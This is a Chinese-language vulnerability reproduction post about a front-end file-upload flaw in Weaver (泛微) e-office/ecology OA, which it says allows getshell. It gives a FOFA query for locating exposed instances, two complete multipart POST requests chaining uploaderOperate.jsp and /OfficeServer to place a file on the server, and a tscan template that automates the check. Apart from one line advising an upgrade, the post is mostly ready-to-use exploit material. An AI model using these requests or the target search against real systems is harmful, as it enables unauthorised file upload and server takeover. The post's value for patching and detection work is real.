泛微effice9 uploaderOperate前台文件上传漏洞

昶之琴

1年前发布

260

一、漏洞详情

2022年护网期间公开漏洞显示泛微ecology前台存在文件上传漏洞可getshell

二、漏洞影响范围

漏洞影响的产品版本包括：泛微ecology

三、漏洞复现

使用 fofa搜索
app=”泛微-协同办公OA”
漏洞链接
http://x.x.x.x:81/workrelate/plan/util/uploaderOperate.jsp
空白页面证明漏洞存在

poc1:

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"

1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"

1
------WebKitFormBoundarymVk33liI64J7GQaK—

放包后记住“fileid”

poc2:

POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK—

成功上传

http://x.x.x.x:81/testlog.txt

tscan poc

params: []
name: fanwei_oa_getshell_2022.09
set: {}
rules:
- method: POST
  path: /workrelate/plan/util/uploaderOperate.jsp
  headers:
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
      like Gecko) Chrome/104.0.5112.81 Safari/537.36
  body: |2-

    ------WebKitFormBoundarymVk33liI64J7GQaK
    Content-Disposition: form-data; name="secId"

    1
    ------WebKitFormBoundarymVk33liI64J7GQaK
    Content-Disposition: form-data; name="Filedata"; filename="testl.txt"

    Test
    ------WebKitFormBoundarymVk33liI64J7GQaK
    Content-Disposition: form-data; name="plandetailid"

    1
    ------WebKitFormBoundarymVk33liI64J7GQaK
  search: ""
  followredirects: false
  expression: response.status==200
- method: POST
  path: /OfficeServer
  headers: {}
  body: |-
    ------WebKitFormBoundarymVk33liI64J7GQaK
    Content-Disposition: form-data; name="aaa"

    {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
    ------WebKitFormBoundarymVk33liI64J7GQaK—
  search: ""
  followredirects: false
  expression: response.status==200
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

四、漏洞处置建议

尽快升级到最新版本。

评分

欢迎为Ta评分